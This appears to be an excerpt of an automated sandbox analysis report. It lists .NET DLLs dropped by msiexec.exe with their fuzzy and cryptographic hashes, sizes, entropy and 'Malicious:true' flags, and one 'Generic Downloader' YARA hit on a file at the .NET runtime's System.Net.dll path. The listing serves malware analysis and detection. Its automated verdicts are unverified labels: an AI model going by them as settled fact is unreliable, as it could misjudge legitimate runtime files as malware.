                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:vtjvFk4HiSLahyjGNbykDXO3bf5G+bHX7T1sWkN6OcE/64BWm1/2us/6M6eURoi5:FbFk4C5y4zOz53h+5fwR6eSo9kD
                                                                                                                                                                                                                                                                                                                                  MD5:D45721810B97663F99E10123DDFFEA4C
                                                                                                                                                                                                                                                                                                                                  SHA1:400FA1A9C317DCDAF5A6229B713B3803BB6879A9
                                                                                                                                                                                                                                                                                                                                  SHA-256:1AA669D54F4BBA84C1833E4C6C7FCD6C5057412618604F48844BB79B9FE0AC72
                                                                                                                                                                                                                                                                                                                                  SHA-512:3932DDE0AB8EFF7A0A1DAACA9A6C0F29A17A6F55039F640AEBBEE61CBA07567FE756F5F6A6A787ADFBCBB268A73861F5FE51C177380C3B783D380883DD2F16E9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):293640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.636078633076518
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:mvExTiARl6gq1zPt3CxPpuLdDmRw6WSL/l6eohgni:lR/j6XzBCxPpuLRm1l6Xmni
                                                                                                                                                                                                                                                                                                                                  MD5:FD789783FCE2564634EA2D47D4CF14CB
                                                                                                                                                                                                                                                                                                                                  SHA1:4C4C721EEB969A869625F64150759EA236DA1E7D
                                                                                                                                                                                                                                                                                                                                  SHA-256:7E5A21124CD63F428A24B78290569628F16C7C0D58BD4323CE358B235031AC98
                                                                                                                                                                                                                                                                                                                                  SHA-512:B0C4F2072E239312ACBFA868E5A69957CBAF058A189DB1DC4B2DD2265396C69C6A5813B8A8FF1D18F7950A93D3AAD08B51AE58805E1E14891EE8BA873D528886
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):349456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.619249857259698
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:ymhqNLrajj/iS/9z3E8djsPOkdMA4f5G/eopZFBq1Y:y8YPafiUWXAr1Y
                                                                                                                                                                                                                                                                                                                                  MD5:646F04A2738C65F25D1934E497ACFBA7
                                                                                                                                                                                                                                                                                                                                  SHA1:19850A695DC06568C4B4766A2BDF4D0383A6A273
                                                                                                                                                                                                                                                                                                                                  SHA-256:68BD9418A0B1ECBFD4202F145D00C0D23BB40F1936964A2B7EEB979053B234FA
                                                                                                                                                                                                                                                                                                                                  SHA-512:88664A6FE955AC149EF6C4E5DAE49D414BE01B7FDCC7BD3BF578B84BC84D63BCC6EB12BC53495C255E19A3977877C04DACFB2D5D078AAA4B2B0E9F0474383CC1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):685320
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8245378715729474
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:XiPF+HUmX2XIw9BaNGRjpgPzLoLLwCvUX3L/Z9q92OD:XiS7X2N9Bki8k
                                                                                                                                                                                                                                                                                                                                  MD5:CA07464D94CC02F114CDA16BD19CCF01
                                                                                                                                                                                                                                                                                                                                  SHA1:552B26F881040EF5622E4B8B728D9F964CAC7B99
                                                                                                                                                                                                                                                                                                                                  SHA-256:EC1941E90A90CDE9F11CFCEF96B7618790EC321E760E4F3AFD53096DE7179484
                                                                                                                                                                                                                                                                                                                                  SHA-512:7BD77B75539065AA42F04A62928E22D3BF823026597398D8923BB9C12E034EF183E629D39A5C7324D17BF50B3064F5D009DDC2916B2C7EB9EAF3FEDD180DF5C4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):37136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.50638514033971
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:NW+nFWGN7798x33dWc8fIY6WxR6OU1RpnJ87bxHKnfrjRYFSlxgdg3a2myQJNx9x:jTJyMBing5AD9wggDsKmqrFClA9zJ
                                                                                                                                                                                                                                                                                                                                  MD5:33F1488B82619B32EF30D8FA10932A83
                                                                                                                                                                                                                                                                                                                                  SHA1:073459116F208778B98A4B996984D6ABF742D820
                                                                                                                                                                                                                                                                                                                                  SHA-256:F91AFB1582BDD85D9B6CC6D4E5774169825E73E4BCD3A36C4408D37637731CC6
                                                                                                                                                                                                                                                                                                                                  SHA-512:96DF7CBEB36BF3CBB460DD6F531CD30971DE904A55354F9B9ED3FD67A3B0DD7800EDD2400EBEB9A329AF707B0232BA280FBC6B9C5690AF5F391CA2CC26131672
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):506632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.739877963601641
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:iY72vFk13eFkZMdvJEKzDiL1vu21pcIzL9wKopz+t+dR5jJ3B+P:iY72G13ZMliwiwOoZ+t+dRz34P
                                                                                                                                                                                                                                                                                                                                  MD5:B1C89B1E9A5D537A32BFC42710B590C6
                                                                                                                                                                                                                                                                                                                                  SHA1:0D0AEC1748EC4B8B50C23E82F6453908AE4F4F66
                                                                                                                                                                                                                                                                                                                                  SHA-256:E15AFD60ED6A5801F153648A77F36D15B7F9EDD1934CD342AAA3312D23E57FC1
                                                                                                                                                                                                                                                                                                                                  SHA-512:35E24F64F3D0A8FD171736C2503DC45931A9169C30BDFA450A741B0DD3E8E264B82508937CB52AFF31FFCCFE86DA4BB8FBFE38148748B3ED76F39B611D777F37
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):166696
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.64714001372041
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:5xwi2eI9dTW/NFVMqRcz7qu0OxDVY3qwJhlij3PMluseo1rzSH:rwi2eORW/3/RczOu0ghsegzS
                                                                                                                                                                                                                                                                                                                                  MD5:E66E573B815651533098204FE8F6A4B3
                                                                                                                                                                                                                                                                                                                                  SHA1:8A781D7E5C60F432BFB81FE4CBDCF1387E1B5711
                                                                                                                                                                                                                                                                                                                                  SHA-256:2AF045741EF32D6C92E345D75281B39EA818958C01ECB47834E43540901EBC83
                                                                                                                                                                                                                                                                                                                                  SHA-512:32247AAF0B7E71B365DD752A51C296C2EC3CB880A02106E4774616638E5ADEF16EEF163CB797076E9F891F612C4E38FD8039A3194C4533A07374DCF6B1477054
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):60696
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.535904077319764
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:HBfRKv+6SDbVXWTlEG3VulTTTTTTTTTTTTTTTTTTTTTTTTT0NW8zOCb:HrKKpXqln3VRNrJb
                                                                                                                                                                                                                                                                                                                                  MD5:1A2192CD55AC26651019BD5716EDF274
                                                                                                                                                                                                                                                                                                                                  SHA1:9DDFCAAB954D4E86CFC9DA88E666AB57A19A0561
                                                                                                                                                                                                                                                                                                                                  SHA-256:2888BFDD67C2A71968E5945814471BFFC0A3BDE85980DF855CE3D60FE93C76E2
                                                                                                                                                                                                                                                                                                                                  SHA-512:2E4ABC3F4FF57418B2C0DDDEFDFCFBC48AE6B4ED5AD6C28C4917C04DC447A52B3356FE5F478283930FCE7079D08742946844F7537EC5D9E90C7163CA99174922
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32056
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.557487177148606
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:y3WpQwWm/k/viYHcZg2VUi6VGt1QWKlL/95/1oqOMlGFESX6HRN7PSpGR9z35v:yNyk/vL72Vd1HgTls3WPSY9zJv
                                                                                                                                                                                                                                                                                                                                  MD5:6EB91FC196B1CC9F19B2CD8FC3E8434A
                                                                                                                                                                                                                                                                                                                                  SHA1:AF03A2772C81E7CA43DE3297979F110BAAA6CFDF
                                                                                                                                                                                                                                                                                                                                  SHA-256:8F91556DE372D206D3622027C4512398B58EC8859C376A7D144926E0E85E51DA
                                                                                                                                                                                                                                                                                                                                  SHA-512:2AA33D88632309BC64932A1E330072CDCD0D8C9952B7B9CB25F367EDF7AA11BD005C2299AF0E1D4E3005D75CDD2620688322F14ADD8B03A1B3A01FC454E8ED71
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):76568
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.4853478188512375
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:67OYMIHH9XOUiSd13OETTzlw49YLOXC3zlc5rbIRWpqIWHVz9:8ln5zX33DTTzlp9YLNDlc5rMZIq5
                                                                                                                                                                                                                                                                                                                                  MD5:4F6B324C53BBB877F0F42A6EAB84179B
                                                                                                                                                                                                                                                                                                                                  SHA1:3E57D33C2292533D31CE0D5254C2225ADFB1F1ED
                                                                                                                                                                                                                                                                                                                                  SHA-256:83968FC6BDF453ED228B7DA140C248ADE2F7A6084978DB67205A97636664F11D
                                                                                                                                                                                                                                                                                                                                  SHA-512:284DE4790BADFB59A9CD378A4789219CBC4CBEAB299F8F126B167EDB77F9204CBFEC9EC4309743E414D6931B7FFC73D530C2253C609A68679115EEA3C9894BBC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):182064
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.640593125749875
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:crJ1yGe/CWqtx3IRJK9Gkszawp+z1Mq87repROMKKnXWRDYZbQLmvh6st/9o1BV/:+yGtt+Rh887rijXXWrmvh3tu1O/ZRhmV
                                                                                                                                                                                                                                                                                                                                  MD5:C7159CD5889AACF32C60F1209B45B306
                                                                                                                                                                                                                                                                                                                                  SHA1:B21C82BC847D02C854BBF06B5F7DC6570EE95323
                                                                                                                                                                                                                                                                                                                                  SHA-256:30698ED152943072144CFFA5530C4D1F7A39C2AC0B9D4D982CA39CD9011FDF70
                                                                                                                                                                                                                                                                                                                                  SHA-512:3261D5EBB7D2240E9D901A4FF42E89F05A336BB4DF9AFC5063B79DEDEC705C7357DDADDB41B1C61FE9D91784C03163E10025CB63AF3EE0A38776A50AE9688F7E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.581798101266097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:pV6EWw138N8G2WowVaWTYA6VFHRN7u+TcTR9z6ZGa:pV6Er138x/FClBwV9z/a
                                                                                                                                                                                                                                                                                                                                  MD5:9E6ACD5E0685D1C4B169FFCC4A990B48
                                                                                                                                                                                                                                                                                                                                  SHA1:67DC8BF8B6A120C3CE8FE8BDFF88BD84CB11FE77
                                                                                                                                                                                                                                                                                                                                  SHA-256:A6BF9DB02AA10F6ED725DD5D7E72AEF926361DF982F135CF8D9EAAE4FAFE47AC
                                                                                                                                                                                                                                                                                                                                  SHA-512:62E8CB2DDB1CE54D327F9324BA49ECAFA650A98F83C494F2083A45850334976E7A3B375CAE46B3DE65A384D22E378A862C66506CE5947A4B3C9F9D91B0009D01
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.708846111618444
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:1Brpigxx9pWabBWipWjA6Kr4PFHnhWgN7acWDDcADB6ZX01k9z3AtOnV:157jpWabBWiYA6VFHRN7+DcTR9z6iV
                                                                                                                                                                                                                                                                                                                                  MD5:30549E2D5F2895F31260F03550D1AB89
                                                                                                                                                                                                                                                                                                                                  SHA1:2A9A436A1423569F906CAE05BD068849CFFE2D5F
                                                                                                                                                                                                                                                                                                                                  SHA-256:D21E226271AB8F12D1020BD9C644E5E77E6189C4F11931457A1638FAE8E85F21
                                                                                                                                                                                                                                                                                                                                  SHA-512:1962C98B89742FE19B23E928AC5659FF590CF561EB59B47986868794811B58865A76DB54AA6B9F8C2B24B40122D36158DD064BB4C848C3DC29C56634201AF035
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.700345163959257
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:cYawsYuvWevNWJpWjA6Kr4PFHnhWgN7agW3IgRxwVIX01k9z3AAljul+Yth:YHvvWevNWJYA6VFHRN76PR9z5lju5th
                                                                                                                                                                                                                                                                                                                                  MD5:251B3ADECBFC6975739805BAE9F63A05
                                                                                                                                                                                                                                                                                                                                  SHA1:5B04529783740F8BF1201ECA0DDE06D12C1C9A29
                                                                                                                                                                                                                                                                                                                                  SHA-256:1D46A019294A694C09B124AAD3FB55240A28035410FFF99AE028B08A8B0D42E0
                                                                                                                                                                                                                                                                                                                                  SHA-512:8FF80308BE71189708F8139565818D4510FB8917E8657842635F02BFAAB9F944D80A1683E86E0885FE876BF1309AB12CF4B1497FB7DEC5E169C142595AC97894
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):91312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.552363583416721
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:7YFJyHM3VtaIGdrG6mksFajOoPnCXrrgpenOpEINYcIwUAZ+K+t34h6FqgHzqWUE:7Yms3VsI+Dmkz8gMnOQcdDzsqSqWfz/
                                                                                                                                                                                                                                                                                                                                  MD5:298C81F3EBB890CC364CCFDCF34058C5
                                                                                                                                                                                                                                                                                                                                  SHA1:6934C79624BB3DA9D22954EE339049D43D9BB83A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A3D82D91C5C016586867F63F6CB75DD2062BC65068F3F1BFFE87DB6EF3C5F743
                                                                                                                                                                                                                                                                                                                                  SHA-512:F6DF7D3274A50BAAAD7A3B748615BC111040A080AB966956143A2E1A6CFA69A6CB64D6DB192CB1FCFF147BBF5E2C8BB6AC94B2101E6B8136136D5B1D7002BBBD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10637488
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.834759168341911
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:QKlZeeIfZQsU+fRIwvUVvJS63bX4PrLAU4n/0v4/PyGvjr:3CfSsU+fRI/VvJSyX8OyGv3
                                                                                                                                                                                                                                                                                                                                  MD5:E483FEE9AC7ACE5AD3DBE0922BA0429B
                                                                                                                                                                                                                                                                                                                                  SHA1:EC481C588B3BD84305703C854EAEC4FD5998639E
                                                                                                                                                                                                                                                                                                                                  SHA-256:9133F14A629B51EB91BCB80BE17D6228BDB31CF64F1FF7D62CCB4C70E3D30CA7
                                                                                                                                                                                                                                                                                                                                  SHA-512:318CEC35F2DC2D44AF2CC00AD1300EC71CEB89AC9E199B059E1B3428405583662B2013632A89C961085A5596F1C301AAFF498CA8D8222BCD65E462C21E3284DA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2077448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.722460846508454
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:7r/zyRgRZfG3NMhSsdt1VTxpCBqlY5anISqsVZp3tODPPLD2DL0qF2:3/xZOqF2
                                                                                                                                                                                                                                                                                                                                  MD5:19BF6B8608C66AC95564DF67948A1F01
                                                                                                                                                                                                                                                                                                                                  SHA1:2E51080CCD8D044CB7F88E5186CD6A27234E7349
                                                                                                                                                                                                                                                                                                                                  SHA-256:3160457511B908D08EE652586B6288827D894765319E4D874271C6E35C569CCC
                                                                                                                                                                                                                                                                                                                                  SHA-512:F27689677446EEF7D559F94EF7E48C6C3E0629119516D91E9C2F11F80E7481D5AD749A59F75DDE09C03342B1E5FB2CAC3C933A32A05F678FA7977A0F65AE26BD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):252712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.803118641554585
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:4Y9Nlu+ra9AkzUhysCmV9tC0XAoe0tAqBmlvaP8lgYD3cRW8qZ+aodJsu/Q0DAsg:Di8ZkzvslViFoeEivw8lgw3cKZejsMvg
                                                                                                                                                                                                                                                                                                                                  MD5:EC9FF4357A78C2DCBC6092ADA5A2AE6F
                                                                                                                                                                                                                                                                                                                                  SHA1:5A8EC381B24FB168B9586CEDDE3680506D71AF47
                                                                                                                                                                                                                                                                                                                                  SHA-256:3C038D1F2461A38D1E3E5FA06A524F493554DF07A5B0661968E32B3CCE5212B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:1441EA2BDB046FEC70C628BA3A6920438695190C265F020A54B5614F62452818CF47B6D808DB37D4EDD0532BB349EA09F86AF695D5FAF6F35D4CC09D233F1328
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):405264
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.714042900365998
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:KR+I69Gw4hphuS5BpIVGcHH8lKPmS6up6+:2+WNhpBynH8G16j+
                                                                                                                                                                                                                                                                                                                                  MD5:9D4484E7B3FEC9597EF9ED633AA3168F
                                                                                                                                                                                                                                                                                                                                  SHA1:21DD509808A6A0EECF13298E3FA541A391E452C2
                                                                                                                                                                                                                                                                                                                                  SHA-256:29DB6AF0D7E4400CD041FAC47546B20BDA2CE5EB730264C99FBC0986751085D8
                                                                                                                                                                                                                                                                                                                                  SHA-512:4CC385ED15E2038FCDCA55A57E83CEB787B80E1CEF18EDB2BB36E912563BDEBE7DF74B1AAEA6347B0823299FF967F3483D761387B330543AE0C2752A8B6051B1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8505608
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.821437608207014
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:Smwr9q/Lo4Ou8M1xwOSZ+0TaFqZlH1naEeVQjhV:h/XOu8MzwOSZRYQ5deWjX
                                                                                                                                                                                                                                                                                                                                  MD5:3A78E5F2522B643BE517D485D2FA9EC5
                                                                                                                                                                                                                                                                                                                                  SHA1:4542B8B41B97CDF08672114D38DA87FAE88775AC
                                                                                                                                                                                                                                                                                                                                  SHA-256:335867B5D2E3FF3FF3B0CFAC4D8B654300AF9E3BEC3E0A6A38441415335381EB
                                                                                                                                                                                                                                                                                                                                  SHA-512:84F92F4661D66AB1EE5EDA970204A5487E941CA0A83C105B701B818B653950E11E9753DFB3F840C055DED799D23F8928CC9501BB6DBD198B9216B1BA438B0C24
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):66312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.579630181472548
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:SsGqs6PbkymbnA0be+s8cu5BiEUxbluKm0i9pzWYf:SsxsUoymbAiy8BiEY9m0QpyYf
                                                                                                                                                                                                                                                                                                                                  MD5:7051A2BBADB9065085E4354A1F300936
                                                                                                                                                                                                                                                                                                                                  SHA1:EE7E3E2029DDD2E5044A9E74FD4659CA2D792AAC
                                                                                                                                                                                                                                                                                                                                  SHA-256:AC28D3517C24ECC00AF041D5B3C3D878AA816082F658AD826D6F6CD0C4D5E170
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EEE4C0C03E5086A425D047E8EBEFC28EF4DF603BBCEE22A03C363383299ED6C001BF5E45FE8146058285E08E22B21926DB7CE78A7D735DF8EDDA89B9F9668EB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.731452166320643
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:KdmAPIh5WVsUWjYA6VFHRN7c7VXC4deR9zVjx0B:nAPCTdFClc7VXC4dC9zVj6
                                                                                                                                                                                                                                                                                                                                  MD5:23DCCA25D64F033EC933CBF083D19EA7
                                                                                                                                                                                                                                                                                                                                  SHA1:3FC9E0DD194587839DDD66ED84DC0F6424031794
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD9BE884AF004544C47727D6C84256395F3968A97C9AF47484BAD919F103A9D4
                                                                                                                                                                                                                                                                                                                                  SHA-512:2C19609752E2E40F3FF48CF30E51B4ED58836FA4DADE6A250EA2F34579CBB9BE4F9B07A68C2D3CDB61537FC8C408946D3DB336E9D4BD7E4C404F75C1E5036596
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
